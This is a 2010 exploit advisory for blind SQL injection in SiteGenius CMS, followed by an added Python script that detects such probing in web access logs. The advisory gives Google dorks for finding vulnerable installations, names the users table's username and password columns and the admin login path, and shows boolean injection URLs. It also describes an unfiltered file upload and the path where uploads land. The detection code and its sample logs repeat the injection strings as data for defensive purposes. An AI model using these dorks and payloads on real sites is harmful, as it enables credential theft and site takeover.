`# Exploit Title: SiteGenius CMS Blind SQL Injection Vulnerabilities
# Date (found): 7.2010
# Author: MikiSoft (Email: [email protected])
# CMS (Software) Site/Link: http://www.webtopsolutions.net, http://www.hostingcms.ch/home/index.php?p=143
# CMS Info.: SiteGenius 2002 is a framework for business excellence internet presence for small and medium enterprises. Although SiteGenius 2002 is a content management tool, it has features for cataloguing products, services or any structured resources, CRM intranet support, a form wizard for simple creation of forms for interacting with visitors, and many more...
# Versions (affected): All
# Google dorks:
inurl:"/sitegenius/topic.php?id=" ; inurl:"/sitegenius/article.php?id=" ; inurl:"/sitegenius/article.php?aid=" ; inurl:"/sitegenius/sitemap.php" ; inurl:"/sitegenius/index.php"
## Blind SQLi Vulnerabilities:
Affected files: topic.php & article.php.
SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php
Example (demonstration):
http://sitename.domain/sitegenius/topic.php?id=1 and 1=1 '-> True
http://sitename.domain/sitegenius/topic.php?id=1 and 1=2 '-> False
etc./and so on...
Btw., here is the location of uploaded images. Any file can be uploaded to the gallery: the extension filter is disabled, even though the interface reports that it is enabled. Example (if the uploaded filename is "file.ext", in the gallery): http://sitename.domain/uploads/images/sitename_domain_file.ext
###END###
##P.S. If you have any questions, comments, or concerns, feel free to contact me.
`
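As a detection aid for the boolean-based probing shown in the advisory's example, the following added example (not part of the original advisory) scans web access logs for requests to topic.php and article.php whose id/aid parameter is not a plain integer. The log lines are constructed samples in combined log format, and the assumption that legitimate id and aid values are always numeric is made here, not stated by the advisory.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Scripts and parameters taken from the advisory's affected files and URL patterns.
WATCHED = {"topic.php": ("id",), "article.php": ("id", "aid")}
# Combined log format. The request target may contain raw spaces, so capture
# lazily up to the optional " HTTP/x.y" suffix instead of stopping at a space.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (.+?)(?: HTTP/[\d.]+)?" (\d{3})'
)
PLAIN_INT = re.compile(r"[0-9]+")

def suspicious_requests(lines):
    """Return {client_ip: [(script, param, decoded_value), ...]} for watched
    parameters whose value is not a plain integer (assumption: legitimate
    id/aid values are always numeric)."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, target, _status = m.groups()
        url = urlsplit(target)
        script = url.path.rsplit("/", 1)[-1].lower()
        if "/sitegenius/" not in url.path.lower() or script not in WATCHED:
            continue
        # parse_qs percent-decodes values and turns '+' into spaces.
        params = parse_qs(url.query)
        for name in WATCHED[script]:
            for value in params.get(name, []):
                if not PLAIN_INT.fullmatch(value):
                    hits[client].append((script, name, value))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jul/2010:10:01:02 +0000] "GET /sitegenius/topic.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Jul/2010:10:02:10 +0000] "GET /sitegenius/topic.php?id=1%20and%201=1 HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [12/Jul/2010:10:02:11 +0000] "GET /sitegenius/topic.php?id=1+and+1=2 HTTP/1.1" 200 1034 "-" "-"',
    '203.0.113.9 - - [12/Jul/2010:10:02:15 +0000] "GET /sitegenius/article.php?aid=7 HTTP/1.1" 200 4801 "-" "-"',
    '192.0.2.44 - - [12/Jul/2010:10:05:40 +0000] "GET /sitegenius/article.php?aid=3 and 1=1 HTTP/1.1" 200 4801 "-" "-"',
    '192.0.2.44 - - [12/Jul/2010:10:05:41 +0000] "GET /index.php?id=abc HTTP/1.1" 404 210 "-" "-"',
]

if __name__ == "__main__":
    for client, found in suspicious_requests(SAMPLE_LOG).items():
        print(client, len(found), found)
```

Clients with several flagged values against the same script, especially paired with differing response sizes, are the ones to review first.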